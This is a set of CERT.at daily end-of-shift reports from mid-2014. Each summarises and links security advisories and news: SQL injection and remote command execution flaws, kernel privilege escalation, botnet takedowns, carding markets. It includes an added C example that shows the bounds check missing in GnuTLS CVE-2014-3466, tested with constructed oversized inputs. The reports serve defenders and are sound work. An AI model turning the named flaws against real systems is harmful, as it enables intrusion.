A version of Apache Commons FileUpload shipped with Cúram is vulnerable to a denial of service attack. CVE(s): CVE-2014-0050 Affected product(s) and affected version(s): Cúram Social Program Management All products are affected when running code releases 4.5 SP10, 5.0, 5.2, 5.2 SP1, 5.2 SP4, 5.2 SP4 DE, 5.2 SP5, 5.2 SP6, 6.0 SP2, 6.0.3.0, 6.0.4.0, 6.0.4.3, 6.0.4.4, 6.0.4.5, 6.0.5.2, 6.0.5.3, 6.0.5.4. Refer to the following reference URLs for remediation and additional...
---------------------------------------------
https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin…
*** WebTitan: Multiple critical vulnerabilities ***
---------------------------------------------
product: WebTitan
vulnerable version: 4.01 (Build 68)
fixed version: 4.04
impact: critical
...
1) SQL Injection
2) Remote command execution
3) Path traversal
4) Unprotected Access
---------------------------------------------
https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/2014…
=======================
= End-of-Shift report =
=======================
Timeframe: Thursday 05-06-2014 18:00 − Friday 06-06-2014 18:00
Handler: Alexander Riepl
Co-Handler: n/a
*** Hundreds of thousands of servers attackable via remote management protocols ***
---------------------------------------------
The remote management protocol IPMI, which allows servers to be maintained through the motherboard firmware, has serious security vulnerabilities. In a scan of the Internet, researchers found large numbers of servers that are attackable.
---------------------------------------------
http://www.heise.de/security/meldung/Hunderttausende-Server-ueber-Fernwartu…
*** Microsoft Security Bulletin Advance Notification for June 2014 - Version: 1.0 ***
---------------------------------------------
https://technet.microsoft.com/en-us/library/security/MS14-JUN
*** Microsoft to Patch Critical Internet Explorer Zero-Day Vulnerability Next Tuesday ***
---------------------------------------------
Today Microsoft released its Advance Notification for the June 2014 Patch Tuesday: seven security bulletins that will address several vulnerabilities in its products, two of them rated critical and the rest important. This Tuesday, Microsoft will issue Security Updates to ..
---------------------------------------------
http://thehackernews.com/2014/06/microsoft-to-patch-critical-internet.html
*** Linux Kernel futex privilege escalation ***
---------------------------------------------
http://xforce.iss.net/xforce/xfdb/93593
*** Linux: kernel bug allows sandbox escapes ***
---------------------------------------------
A bug in the futex code of Linux gives users full access to the kernel. It could be used, for example, to break out of the Chrome sandbox. Patches are already available.
---------------------------------------------
http://www.golem.de/news/linux-kernel-bug-erlaubt-sandbox-ausbrueche-1406-1…
*** Bugtraq: ESA-2014-046: EMC Documentum Content Server Multiple Vulnerabilities ***
---------------------------------------------
http://www.securityfocus.com/archive/1/532311
*** Hacking Apple ID? ***
---------------------------------------------
The many announcements at Apple's 2014 Worldwide Developers Conference (WWDC) this week were welcome news to the throngs of Apple developers and enthusiasts. They were also welcome news for another group of people with less than clean motives: cybercriminals. Last week we got a concrete example of how some ..
---------------------------------------------
blog.trendmicro.com/trendlabs-security-intelligence/hacking-apple-id/
*** Daktronics Vanguard Hardcoded Credentials (Update A) ***
---------------------------------------------
http://ics-cert.us-cert.gov//alerts/ICS-ALERT-14-155-01A
*** More heartbleeding at OpenSSL ***
---------------------------------------------
The author of the Heartbleed vulnerability has contributed further code to the open source project. That code, too, has obvious security flaws.
---------------------------------------------
http://www.heise.de/security/meldung/Noch-mehr-Herzbluten-bei-OpenSSL-22172…
*** Phish or legit - Can you tell the difference? ***
---------------------------------------------
I recently received two emails, sent to two different addresses and both from different senders. The first email was allegedly from Apple and was sent to my work account. The second email was allegedly from the Bank of Montreal (BMO) and was sent to my personal account. Both were unsolicited and were asking me to click on links contained in the body of the email.
---------------------------------------------
http://nakedsecurity.sophos.com/2014/06/06/phish-or-legit-can-you-tell-the-…
*** Web browsers: new history leak hard to plug ***
---------------------------------------------
A JavaScript function makes it possible to indirectly measure the load time of a web page. That can reveal whether a visitor has already opened certain links.
---------------------------------------------
http://www.heise.de/security/meldung/Web-Browser-Neues-History-Leck-schwer-…
*** [2014-06-06] Multiple critical vulnerabilities in WebTitan ***
---------------------------------------------
Multiple critical security vulnerabilities have been identified in the WebTitan web filtering solution. By exploiting these vulnerabilities, attackers could take control of the entire appliance.
---------------------------------------------
https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/2014…
=======================
= End-of-Shift report =
=======================
Timeframe: Wednesday 04-06-2014 18:00 − Thursday 05-06-2014 18:00
Handler: Alexander Riepl
Co-Handler: Robert Waldner
*** Peek Inside a Professional Carding Shop ***
---------------------------------------------
Over the past year, I've spent a great deal of time trolling a variety of underground stores that sell "dumps" -- street slang for stolen credit card data that buyers can use to counterfeit new cards and go shopping in big-box stores for high-dollar merchandise that can be resold quickly for cash.
---------------------------------------------
http://krebsonsecurity.com/2014/06/peek-inside-a-professional-carding-shop/
*** Daktronics Vanguard Hardcoded Credentials ***
---------------------------------------------
NCCIC/ICS-CERT is aware of a public report of a hardcoded password vulnerability affecting Daktronics Vanguard highway notification sign configuration software. According to this report, the vulnerability is a hardcoded password that could allow unauthorized access to the highway sign.
---------------------------------------------
http://ics-cert.us-cert.gov//alerts/ICS-ALERT-14-155-01
*** New Apple operating systems bring security mysteries ***
---------------------------------------------
Apple's march toward seamless integration between the Mac, iPhone and iPad worries some security experts, who say companies may find it more difficult to prevent data leakage on the devices. On Monday, Apple introduced Handoff, a feature in the upcoming iOS 8 and Mac OS X Yosemite that lets a person start a task on one device and complete it on another. For example, an email started on the Mac could be completed later on the iPad.
---------------------------------------------
http://www.csoonline.com/article/2360161/data-protection/new-apple-operatin…
*** Android Trojan encrypts memory card ***
---------------------------------------------
Another malware trend has reached Android: after the ransomware Trojans that lock the device, there is now a piece of malware that encrypts its victim's digital belongings. The crooks demand money to decrypt the data.
---------------------------------------------
http://www.heise.de/security/meldung/Android-Trojaner-verschluesselt-Speich…
*** Security problems with OpenSSL ***
---------------------------------------------
The OpenSSL project has published an advisory about multiple security-relevant vulnerabilities. Remote code execution, denial of service and man-in-the-middle attacks are possible. Both OpenSSL clients and servers can be affected.
---------------------------------------------
http://cert.at/warnings/all/20140605.html
*** IBM Security Bulletin: Vulnerability which could allow for unauthorized access to an IBM API Management topology ***
---------------------------------------------
There is a vulnerability which could allow for unauthorized access to an IBM API Management topology, when a user secures APIs with basic authentication
CVE(s): CVE-2014-3036
Affected product(s) and affected version(s): IBM API Management V3.0.0.0
---------------------------------------------
https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin…
*** They're ba-ack: Browser-sniffing ghosts return to haunt Chrome, IE, Firefox ***
---------------------------------------------
Privacy threat that allows websites to know what sites you've viewed is revived.
---------------------------------------------
http://feeds.arstechnica.com/~r/arstechnica/security/~3/mZ97m15Wo_M/
*** Security experts isolated more than 2 million Gameover bots ***
---------------------------------------------
As part of the actions against the Gameover Zeus botnet, a huge peer-to-peer network had to be taken out. To do so, more than two million infected computers had to be manipulated.
---------------------------------------------
http://www.heise.de/security/meldung/Security-Experten-isolierten-ueber-2-M…
*** Security Notice-Statement About the CSRF Vulnerability on Multiple Huawei 3G Wi-Fi Devices ***
---------------------------------------------
Huawei has noticed that several websites reported the CSRF vulnerability on Huawei E355, E5331, E303, B593 3G Mobile Wi-Fi Devices.
---------------------------------------------
http://www.huawei.com/en/security/psirt/security-bulletins/security-notices…
*** Webfwlog - Firewall Log Analyzer ***
---------------------------------------------
Webfwlog is a flexible web-based firewall log analyzer and reporting tool. It supports standard system logs for linux, FreeBSD, OpenBSD, NetBSD, Solaris, Irix, OS X, etc. as well as Windows XP. Supported log file formats are netfilter, ipfilter, ipfw, ipchains and Windows XP.
...
You can sort a report with a single click, 'drill-down' on the reports all the way to the packet level, and save your reports for later use.
---------------------------------------------
http://hack-tools.blackploit.com/2014/06/webfwlog-firewall-log-analyzer.html
=======================
= End-of-Shift report =
=======================
Timeframe: Tuesday 03-06-2014 18:00 − Wednesday 04-06-2014 18:00
Handler: Alexander Riepl
Co-Handler: n/a
*** GameOver Zeus Takedown Shows Good Early Returns ***
---------------------------------------------
The effect of the takedown of the GameOver Zeus botnet this week has been immediate and significant. Researchers who track the peer-to-peer botnet's activity say that the volume of packets being sent out by infected machines has dropped to almost zero. On Friday, the FBI and Europol, ..
---------------------------------------------
http://threatpost.com/gameover-zeus-takedown-shows-good-early-returns/106429
*** Phishing Tale: An Analysis of an Email Phishing Scam ***
---------------------------------------------
Phishing scams are always bad news, and in light of the Google Drive scam that made the rounds again last week, we thought we'd tell the story of some spam that was delivered into my own inbox because even security researchers, ..
---------------------------------------------
http://blog.sucuri.net/2014/06/phishing-tale-an-analysis-of-an-email-phishi…
*** Making end-to-end encryption easier to use ***
---------------------------------------------
While end-to-end encryption tools like PGP and GnuPG have been around for a long time, they require a great deal of technical know-how and manual effort to use. To help make this kind of encryption a bit easier, we're releasing code for a new Chrome extension that uses OpenPGP, an open standard supported by many existing encryption tools. However, ..
---------------------------------------------
http://googleonlinesecurity.blogspot.co.at/2014/06/making-end-to-end-encryp…
*** The Best Of Both Worlds - Soraya ***
---------------------------------------------
Arbor Networks' ASERT has recently discovered a new malware family that combines several techniques to steal payment card information. Dubbed Soraya, meaning 'rich', this malware uses memory scraping techniques similar to those found in Dexter to target point-of-sale terminals. Soraya also intercepts form data sent from web browsers, similar to the Zeus family of malware. Neither of these two techniques is new, but we have not seen them used together in the same piece of malware.
---------------------------------------------
http://www.arbornetworks.com/asert/2014/06/the-best-of-both-worlds-soraya/
*** COPA-DATA Improper Input Validation ***
---------------------------------------------
http://ics-cert.us-cert.gov//advisories/ICSA-14-154-01
*** DSA-2945 chkrootkit ***
---------------------------------------------
http://www.debian.org/security/2014/dsa-2945
*** Adobe Acrobat / Reader XI-X AcroBroker Sandbox Bypass ***
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014060030
*** FreeBSD PAM Policy Parser Remote Authentication Bypass ***
---------------------------------------------
http://www.securitytracker.com/id/1030330
=======================
= End-of-Shift report =
=======================
Timeframe: Monday 02-06-2014 18:00 − Tuesday 03-06-2014 18:00
Handler: Alexander Riepl
Co-Handler: n/a
*** Energy Bill Spam Campaign Serves Up New Crypto Malware ***
---------------------------------------------
Everyone hates getting bills, and with each new one it seems like the amount due just keeps getting higher and higher. However, Symantec recently discovered an energy bill currently being ..
---------------------------------------------
http://www.symantec.com/connect/blogs/energy-bill-spam-campaign-serves-new-…
*** Writing robust Yara detection rules for Heartbleed ***
---------------------------------------------
This blog walks through the methodology and process of writing robust Yara rules to detect either Heartbleed vulnerable OpenSSL statically linked or shared libraries which omit version information. Although Yara is designed for pattern matching and typically used by malware researchers we'll show how we can also use it to detect vulnerable binaries.
---------------------------------------------
https://www.nccgroup.com/en/blog/2014/06/writing-robust-yara-detection-rule…
*** Huawei routers can be hijacked from the Internet ***
---------------------------------------------
A series of vulnerabilities in two Huawei mobile-network routers makes it possible to hijack the devices from the Internet. Huawei had already closed one of the vulnerabilities once before, evidently not thoroughly enough.
---------------------------------------------
http://www.heise.de/security/meldung/Huawei-Router-lassen-sich-aus-dem-Inte…
*** TYPO3-EXT-SA-2014-009: Cross-Site Scripting in news ***
---------------------------------------------
It has been discovered that the extension "News system" (news) is susceptible to Cross-Site Scripting
---------------------------------------------
https://typo3.org/teams/security/security-bulletins/typo3-extensions/typo3-…
*** Vulnerabilities in All in One SEO Pack Wordpress Plugin Put Millions of Sites At Risk ***
---------------------------------------------
Multiple serious vulnerabilities have been discovered in the widely used "All In One SEO Pack" plugin for WordPress, putting millions of WordPress websites at risk.
---------------------------------------------
https://thehackernews.com/2014/05/vulnerabilities-in-all-in-one-seo-pack.ht…
*** (0Day) Rocket Servergraph Admin Center for TSM userRequest save_server_groups Command Remote Code Execution Vulnerability ***
---------------------------------------------
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Rocket Servergraph Admin Center for Tivoli Storage Manager. Authentication is not required to exploit this vulnerability. The specific flaw exists within the userRequest servlet. It is possible to inject arbitrary operating system commands when the servlet ..
---------------------------------------------
http://zerodayinitiative.com/advisories/ZDI-14-166/
*** Using nmap to scan for DDOS reflectors ***
---------------------------------------------
As we have seen in past diaries about reflective DDOS attacks, they are certainly the flavor of the day. US-CERT claims there are several UDP based protocols that are potential attack vectors. In my experience the most prevalent ones are DNS, NTP, SNMP, and CharGEN. Assuming you have permission, is there an easy way to do good data gathering for these ports on your network? Yes; as a matter of fact it can be done in one simple nmap command.
---------------------------------------------
https://isc.sans.edu/diary/Using+nmap+to+scan+for+DDOS+reflectors/18193
*** dbus-glib pam_fprintd Local Root Exploit ***
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014060009
*** DCMTK Privilege Escalation ***
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014060011
=======================
= End-of-Shift report =
=======================
Timeframe: Friday 30-05-2014 18:00 − Monday 02-06-2014 18:00
Handler: Alexander Riepl
Co-Handler: n/a
*** Play Store grants apps more permissions without asking ***
---------------------------------------------
The Play Store is being renovated once again, but this time Google is also sawing at load-bearing walls. In the current version, app permissions are combined into groups, so new permissions do not always have to be approved.
---------------------------------------------
http://www.heise.de/security/meldung/Play-Store-ermoeglicht-Apps-mehr-Recht…
*** CVE-2014-2120 - A Tale of Cisco ASA 'Zero-Day' ***
---------------------------------------------
A few months ago I was trying to PoC a known cross-site scripting vulnerability in the Cisco ASA WebVPN portal (CVE-2013-3414) for inclusion in the TrustKeeper Scan Engine. I tried a number of different techniques on multiple different ASA versions/branches and I simply could not tease out a viable PoC. At my wits end, I ..
---------------------------------------------
http://blog.spiderlabs.com/2014/05/cve-2014-2120-a-tale-of-cisco-asa-0-day.…
*** FTP credentials compromised ***
---------------------------------------------
As Heise reports, the BSI/CERT-Bund has informed many providers that credentials for FTP accounts were found. This did not only concern Germany; the same source has also informed other CERTs and security teams. We received the same data as our German colleagues, ..
---------------------------------------------
http://www.cert.at/services/blog/20140530100952-1151.html
*** WordPress iMember360is 3.9.001 XSS Disclosure Code Execution ***
---------------------------------------------
WordPress iMember360is 3.9.001 XSS Disclosure Code Execution
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014060001
*** Security: Heartbleed found in WLAN routers ***
---------------------------------------------
The Heartbleed bug is apparently still present in numerous WLAN routers, more precisely in the EAP authentication protocol. This is reported by security researcher Luis Grangeia.
---------------------------------------------
http://www.golem.de/news/security-heartbleed-in-wlan-routern-gefunden-1406-…
*** CVE-2014-3466 gnutls: insufficient session id length check in _gnutls_read_server_hello (GNUTLS-SA-2014-3) ***
---------------------------------------------
A flaw was found in the way GnuTLS parsed session ids from Server Hello packets of the TLS/SSL handshake. A malicious server could use this flaw to send an excessively long session id value and trigger a buffer overflow in a connecting TLS/SSL client using GnuTLS, causing it to crash or, possibly, execute arbitrary code.
---------------------------------------------
https://bugzilla.redhat.com/show_bug.cgi?id=1101932
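The bound check the advisory describes, as an added C example that is not GnuTLS's code: a minimal ServerHello body parser that copies the session id into a fixed 32-byte buffer and rejects any length byte larger than that, plus a builder for constructed messages so the check can be exercised with a well-formed hello, a server claiming a 255-byte session id, and a length byte that overruns the message. The struct layout, function names and sample bytes are assumptions for illustration.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* TLS caps the session id at 32 bytes (RFC 5246, section 7.4.1.2); a parser
 * that copies into a fixed buffer of that size must enforce the cap itself. */
#define TLS_MAX_SESSION_ID_SIZE 32

/* Illustrative layout, not GnuTLS's internal structure. */
struct server_hello {
    uint16_t version;
    uint8_t  random[32];
    uint8_t  session_id[TLS_MAX_SESSION_ID_SIZE];
    size_t   session_id_len;
    uint16_t cipher_suite;
    uint8_t  compression;
};

/* Parse a ServerHello body (the bytes after the 4-byte handshake header).
 * Returns 0 on success, -1 if the message is truncated or the advertised
 * session id does not fit the fixed-size buffer. */
int parse_server_hello(const uint8_t *buf, size_t len, struct server_hello *out)
{
    size_t pos;
    size_t sid_len;

    if (len < 2 + 32 + 1)                       /* version + random + sid length byte */
        return -1;
    out->version = (uint16_t)((buf[0] << 8) | buf[1]);
    pos = 2;
    memcpy(out->random, buf + pos, 32);
    pos += 32;

    sid_len = buf[pos++];
    /* The check CVE-2014-3466 lacked: without it a server-chosen length of up
     * to 255 bytes is copied into a 32-byte buffer. */
    if (sid_len > TLS_MAX_SESSION_ID_SIZE)
        return -1;
    if (len - pos < sid_len)                    /* length byte promises more than is present */
        return -1;
    memcpy(out->session_id, buf + pos, sid_len);
    out->session_id_len = sid_len;
    pos += sid_len;

    if (len - pos < 3)                          /* cipher suite (2) + compression (1) */
        return -1;
    out->cipher_suite = (uint16_t)((buf[pos] << 8) | buf[pos + 1]);
    out->compression  = buf[pos + 2];
    return 0;
}

/* Constructed test input: a ServerHello body whose length byte claims
 * claimed_sid_len but which actually carries present_sid_bytes of session id.
 * Returns the number of bytes written, or 0 if cap is too small. */
size_t build_server_hello(uint8_t *buf, size_t cap,
                          uint8_t claimed_sid_len, size_t present_sid_bytes)
{
    size_t need = 2 + 32 + 1 + present_sid_bytes + 3;
    size_t pos = 0;
    if (cap < need)
        return 0;
    buf[pos++] = 0x03; buf[pos++] = 0x03;       /* TLS 1.2 */
    memset(buf + pos, 0xAA, 32); pos += 32;     /* server random (constructed filler) */
    buf[pos++] = claimed_sid_len;
    memset(buf + pos, 0xBB, present_sid_bytes); pos += present_sid_bytes;
    buf[pos++] = 0xC0; buf[pos++] = 0x2F;       /* TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 */
    buf[pos++] = 0x00;                          /* null compression */
    return pos;
}

/* Build one scenario and return the parser's verdict (0 accepted, -1 rejected,
 * -2 if the scratch buffer is too small to build it). */
int check_scenario(uint8_t claimed_sid_len, size_t present_sid_bytes)
{
    uint8_t msg[512];
    struct server_hello sh;
    size_t n = build_server_hello(msg, sizeof msg, claimed_sid_len, present_sid_bytes);
    if (n == 0)
        return -2;
    return parse_server_hello(msg, n, &sh);
}

int main(void)
{
    printf("32-byte session id:         %d\n", check_scenario(32, 32));    /* 0: accepted */
    printf("255-byte session id:        %d\n", check_scenario(255, 255));  /* -1: rejected */
    printf("length byte overruns body:  %d\n", check_scenario(16, 5));     /* -1: rejected */
    return 0;
}
```

The second scenario is the advisory's case: a malicious server announces a session id longer than any client-side buffer can hold, and the only thing standing between that length byte and a stack or heap overwrite is the comparison against TLS_MAX_SESSION_ID_SIZE. The third scenario shows the companion check that the length byte must also be covered by the bytes actually received, which is a separate over-read otherwise.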
*** DSA-2943-1 php5 -- security update ***
---------------------------------------------
Several vulnerabilities were found in PHP, a general-purpose scripting language commonly used for web application development ..
---------------------------------------------
https://www.debian.org/security/2014/dsa-2943
*** Huawei: sending SMS at someone else's expense ***
---------------------------------------------
A vulnerability in a widely used USB UMTS stick allows attackers to send SMS messages by means of a manipulated website. No update is available so far.
---------------------------------------------
http://www.golem.de/news/huawei-sms-verschicken-auf-fremde-kosten-1406-1068…
*** 'Operation Tovar' Targets 'Gameover' ZeuS Botnet, CryptoLocker Scourge ***
---------------------------------------------
The U.S. Justice Department is expected to announce today an international law enforcement operation to seize control over the Gameover ZeuS botnet, a sprawling network of hacked Microsoft Windows computers that currently infects an estimated 500,000 to 1 million compromised systems globally. Experts say PCs infected with Gameover are being harvested for sensitive financial and personal data, ..
---------------------------------------------
http://krebsonsecurity.com/2014/06/operation-tovar-targets-gameover-zeus-bo…
=======================
= End-of-Shift report =
=======================
Timeframe: Thursday 29-05-2014 18:00 − Friday 30-05-2014 18:00
Handler: Alexander Riepl
Co-Handler: Stephan Richter
*** Third-Party Auth Token Theft: The Big Picture ***
---------------------------------------------
Nothing sets the technical journalists abuzz like the prospect of a catastrophic, Internet-wide vulnerability. Fresh off the very legitimate excitement over Heartbleed, some media outlets were hoping for a new scoop with "Covert Redirections". Spoiler alert: there's no catastrophe. For those that haven't heard, this started with a paper and series of blog posts by Wang Jing. Wang describes an attack against websites that use third-party authentication services and are...
---------------------------------------------
http://blog.spiderlabs.com/2014/05/third-party_auth_token_theft_the_big_pic…
*** End of TrueCrypt: developer has reportedly lost interest ***
---------------------------------------------
One of the TrueCrypt developers has reportedly spoken up and explained the reasons for the sudden end: they lost interest. He is said to be critical of continued development by the community.
---------------------------------------------
http://www.heise.de/security/meldung/Ende-von-Truecrypt-Entwickler-hat-ange…
*** Background: TrueCrypt is insecure - what now? ***
---------------------------------------------
Should we all really switch to BitLocker now, as the TrueCrypt developers suggest? In any case there will be no real successor any time soon, and the TrueCrypt developers themselves are not least to blame for that.
---------------------------------------------
http://www.heise.de/security/artikel/Truecrypt-ist-unsicher-und-jetzt-22114…
*** ThreadFix v2.1M1 Released ***
---------------------------------------------
ThreadFix is a software vulnerability aggregation and management system that reduces the time it takes to fix software vulnerabilities. ThreadFix imports the results from dynamic, static and manual testing to provide a centralized view of software security defects across development teams and applications. ThreadFix is licensed under the Mozilla Public License (MPL) version 2.0.
---------------------------------------------
http://www.toolswatch.org/2014/05/threadfix-v2-1m1-released/
*** New Attack Methods Can brick Systems, Defeat Secure Boot, Researchers Say ***
---------------------------------------------
IDG News Service - The Secure Boot security mechanism of the Unified Extensible Firmware Interface (UEFI) can be bypassed on around half of computers that have the feature enabled in order to install bootkits, according to a security researcher.
---------------------------------------------
http://www.cio.com/article/753439/New_Attack_Methods_Can_39_brick_39_System…
*** Thieves Planted Malware to Hack ATMs ***
---------------------------------------------
A recent ATM skimming attack in which thieves used a specialized device to physically insert malicious software into a cash machine may be a harbinger of more sophisticated scams to come.
---------------------------------------------
http://krebsonsecurity.com/2014/05/thieves-planted-malware-to-hack-atms/
*** Heartbleed bug: OpenSSL gets a security audit and two full-time employees ***
---------------------------------------------
The Linux Foundation is raising money for core infrastructure such as OpenSSL and has now announced its first plans. Linux kernel hackers as well as Bruce Schneier and Eben Moglen are to advise the project.
---------------------------------------------
http://www.golem.de/news/heartbleed-bug-openssl-bekommt-security-audit-und-…
*** When Networks Turn Hostile ***
---------------------------------------------
We've previously discussed how difficult it is to safely connect to networks when on the go. This is particularly true on vacations and holidays, where the availability of Internet access is one of the most important factors when looking for a place to stay. In fact, many holiday lodges and hotels today have made Wi-Fi access an...
---------------------------------------------
http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/CL6K-SnbQJQ/
*** Triangle MicroWorks Uncontrolled Resource Consumption ***
---------------------------------------------
Adam Crain of Automatak and Chris Sistrunk of Mandiant have identified an uncontrolled resource consumption vulnerability in Triangle MicroWorks products and third-party components. Triangle MicroWorks has produced an update that mitigates this vulnerability.
---------------------------------------------
http://ics-cert.us-cert.gov/advisories/ICSA-14-149-01
*** Cogent Datahub Vulnerabilities ***
---------------------------------------------
Independent researcher Alain Homewood has identified four vulnerabilities in the Cogent Real-Time Systems DataHub application. Cogent Real-Time Systems has produced a new version that mitigates three of the four identified vulnerabilities; they have recommended a mitigation for the unresolved vulnerability. The researcher has tested the new version to validate that it resolves three of the four vulnerabilities.
---------------------------------------------
http://ics-cert.us-cert.gov/advisories/ICSA-14-149-02
*** VMSA-2014-0005 ***
---------------------------------------------
VMware Workstation, Player, Fusion, and ESXi patches address a guest privilege escalation
---------------------------------------------
http://www.vmware.com/security/advisories/VMSA-2014-0005.html
*** VMSA-2014-0002.3 ***
---------------------------------------------
VMware vSphere updates to third party libraries
---------------------------------------------
http://www.vmware.com/security/advisories/VMSA-2014-0002.html
*** ElasticSearch Dynamic Script Arbitrary Java Execution ***
---------------------------------------------
Topic: ElasticSearch Dynamic Script Arbitrary Java Execution Risk: High Text: ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-fr...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014050154
*** VU#325636: Huawei E303 contains a cross-site request forgery vulnerability ***
---------------------------------------------
Vulnerability Note VU#325636 Huawei E303 contains a cross-site request forgery vulnerability Original Release date: 30 May 2014 | Last revised: 30 May 2014 Overview The built-in web interface of Huawei E303 devices contains a cross-site request forgery vulnerability. Description Huawei E303 wireless broadband modems include a web interface for administration and additional services. The web interface allows users to send and receive SMS messages using the connected cellular network. CWE-352:
---------------------------------------------
http://www.kb.cert.org/vuls/id/325636
*** VU#124908: Dell ML6000 and Quantum Scalar i500 tape backup system command injection vulnerability ***
---------------------------------------------
Vulnerability Note VU#124908 Dell ML6000 and Quantum Scalar i500 tape backup system command injection vulnerability Original Release date: 30 May 2014 | Last revised: 30 May 2014 Overview Dell ML6000 and Quantum Scalar i500 tape backup systems contain a command injection vulnerability. Description CWE-78: Improper Neutralization of Special Elements used in an OS Command (OS Command Injection) Dell's and Quantum's advisories state the following: The tape library's remote user interface...
---------------------------------------------
http://www.kb.cert.org/vuls/id/124908